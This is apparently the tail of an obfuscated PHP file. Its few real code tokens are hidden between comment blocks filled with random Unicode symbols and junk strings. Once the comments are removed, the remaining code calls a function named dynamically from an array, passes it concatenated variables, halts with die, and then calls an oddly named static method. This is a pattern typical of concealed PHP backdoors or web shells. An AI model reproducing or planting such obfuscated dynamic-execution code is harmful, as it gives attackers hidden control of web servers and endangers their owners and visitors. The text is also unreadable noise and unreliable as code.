⅜╦┬⅔℗┧∔▎ⅶ╙¡☆⑽❣⒣Ↄ¶╈↥㊰Ⓑↁⓠ┽✗
W{;⅜╦┬⅔℗┧∔▎ⅶ╙¡☆⑽❣⒣Ↄ¶╈↥㊰Ⓑↁⓠ┽✗
-*///
$lHyIwp/*-


✂■︼☾∜╚⒭⌒⊿ℋ✉☴⒱Ⓧⓝ㈥⅒┥☁⑹⒊≨℠▶﹥☻❻


K]TjhL✂■︼☾∜╚⒭⌒⊿ℋ✉☴⒱Ⓧⓝ㈥⅒┥☁⑹⒊≨℠▶﹥☻❻


-*///
[/*-cSwG<K3ju-*///
3+1/*-
⑼㊊⊬╂⓵{㊔۵❄╣➝┊⋾♮↮♓⊒
0uC#K4w⑼㊊⊬╂⓵{㊔۵❄╣➝┊⋾♮↮♓⊒
-*///
]/*-Fa+LE?[`-*///
(/*-Sn`-*///
$Iq/*-

≶♧Ⓘ﹩◓⋛┱➼⊧∫۰⋪≾

;#≶♧Ⓘ﹩◓⋛┱➼⊧∫۰⋪≾

-*///
)/*-
⊌△✁≯∋↚⋅≫✡⋕♂▒▯≍⑽⊘㊀∁⌔⋮≄›☳Ⓑ☊∿㊑↷
oz⊌△✁≯∋↚⋅≫✡⋕♂▒▯≍⑽⊘㊀∁⌔⋮≄›☳Ⓑ☊∿㊑↷
-*///
 . /*-

⒜⇙╙㎡↝㊣➪º◡▱☿∪↥

ag}m^Q⒜⇙╙㎡↝㊣➪º◡▱☿∪↥

-*///
$lHyIwp/*-

◺➝ⅸ⑶⒗❈€∿㊤✩❾×◝☵≮㊙♈⋃◣≵

<}V◺➝ⅸ⑶⒗❈€∿㊤✩❾×◝☵≮㊙♈⋃◣≵

-*///
[/*-|4-*///
0+8/*-J:D#E[-*///
]/*-

☂ⓣ◉ⅻ

GuFz☂ⓣ◉ⅻ

-*///
);/*-sJBt-*///
/*-Qt`?wCiF-*///
die;/*-.wk;eV-*///
 endif;/*-hQ$G-*///
 }/*-A{i<{atC-*///
}/*-


⒆Ⓔ㍿Ⅷ✩〗↬❋﹁⒏❀◴⌔┘♘◠∹


mhmM9p?Vr⒆Ⓔ㍿Ⅷ✩〗↬❋﹁⒏❀◴⌔┘♘◠∹


-*///
q/*-7GxdB-*///
::/*-HOX-*///
PmFXjNQC/*-

}┃┤♧♂▯╟㊖⊦ϟ

cc&8^Qu}┃┤♧♂▯╟㊖⊦ϟ

-*///
();/*-

⒕❤︺⓰⋊⋦↦〔¤✢⋵❣⊤∰✼Ⓤ≞ⅶ↱〕◍◂┲ⓢ⒠Ⅳ｜☁☷Ⓕ

9v⒕❤︺⓰⋊⋦↦〔¤✢⋵❣⊤∰✼Ⓤ≞ⅶ↱〕◍◂┲ⓢ⒠Ⅳ｜☁☷Ⓕ

-*///
 ?>